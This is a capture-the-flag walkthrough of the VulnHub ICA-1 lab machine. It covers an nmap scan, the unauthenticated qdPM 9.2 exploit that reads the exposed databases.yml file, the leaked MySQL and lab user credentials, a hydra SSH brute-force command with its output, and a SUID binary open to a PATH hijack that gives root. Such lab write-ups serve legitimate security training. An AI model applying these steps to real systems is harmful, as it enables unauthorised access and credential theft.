VulnHub ICA-1 Writeup
Machine: https://www.vulnhub.com/entry/ica-1,748/ Machine Author: onurturali
Nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-09 07:55 UTC
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.136
Host is up (0.00065s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
| 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: qdPM | Login
3306/tcp open mysql MySQL 8.0.26
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after: 2031-09-23T10:47:29
|_ssl-date: TLS randomness does not represent time
| mysql-info:
| Protocol: 10
| Version: 8.0.26
| Thread ID: 41
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, SwitchToSSLAfterHandshake, DontAllowDatabaseTableColumn, LongPassword, LongColumnFlag, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, ODBCClient, InteractiveClient, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsLoadDataLocal, ConnectWithDatabase, SupportsCompression, Speaks41ProtocolNew, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: /(%Yj"\x16PRA]*\x05\x1ERt lX7
|_ Auth Plugin Name: caching_sha2_password
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
MAC Address: 08:00:27:49:80:BC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.65 ms 192.168.56.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds
We can see that there is ssh, mysql and http running on the server. Let’s go ahead and check the website since we’ll need credentials for mysql and ssh.
We come across a login page for qdPM. There aren’t any default credentials for this service. So let’s look for any exploits for the qdPM 9.2 version.
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4
The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
We manage to find the above exploit. Let’s go ahead and download the databases.yml file
all:
doctrine:
class: sfDoctrineDatabase
param:
dsn: 'mysql:dbname=qdpm;host=localhost'
profiler: false
username: qdpmadmin
password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
attributes:
quote_identifier: true
We seem to have found credentials for the mysql service
qdpmadmin:UcVQCMQk2STVeS6J
Let’s log on to the mysql service and perform some enumeration there.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| qdpm |
| staff |
| sys |
+--------------------+
6 rows in set (0.004 sec)
MySQL [(none)]> use staff
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [staff]> show tables;
+-----------------+
| Tables_in_staff |
+-----------------+
| department |
| login |
| user |
+-----------------+
3 rows in set (0.001 sec)
MySQL [staff]> select * from user;
+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+
5 rows in set (0.001 sec)
MySQL [staff]> select * from login order by user_id;
+------+---------+--------------------------+
| id | user_id | password |
+------+---------+--------------------------+
| 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== |
| 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== |
| 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== |
| 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== |
| 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
5 rows in set (0.001 sec)
We can see some Users and Passwords encoded in base64. We can’t seem to read any file using the load_file() function. So it seems we will have to create a wordlist of users and passwords based on what we have above.
hydra -L user.txt -P pass.txt 192.168.56.136 ssh -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-09 08:37:31
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking ssh://192.168.56.136:22/
[22][ssh] host: 192.168.56.136 login: travis password: DJceVy98W28Y7wLg
[22][ssh] host: 192.168.56.136 login: dexter password: 7ZwV4qtg42cmUXGX
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-09 08:37:48
We are able to find two users. Let’s ssh into the server using one of them.
We are able to get the user.txt from the travis user. Let’s also go ahead and login using dexter to see what else is there.
There is this note there. Let’s enumerate the system and see what we can find.
We are able to find a binary with the suid bit set on. Let’s analyze this executable on our machine to see what it does.
ltrace ./get_access
setuid(0) = -1
setgid(0) = -1
system("cat /root/system.info"cat: /root/system.info: Permission denied
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 256
socket(2, 1, 0) = 3
puts("All services are disabled. Acces"...All services are disabled. Accessing to the system is allowed only within working hours.
) = 90
+++ exited (status 0) +++
It seem that the binary is calling the cat command to print a file. Since it is calling cat without using the absolute path I think we can do a path export attack on it.
Sure enough we do get root.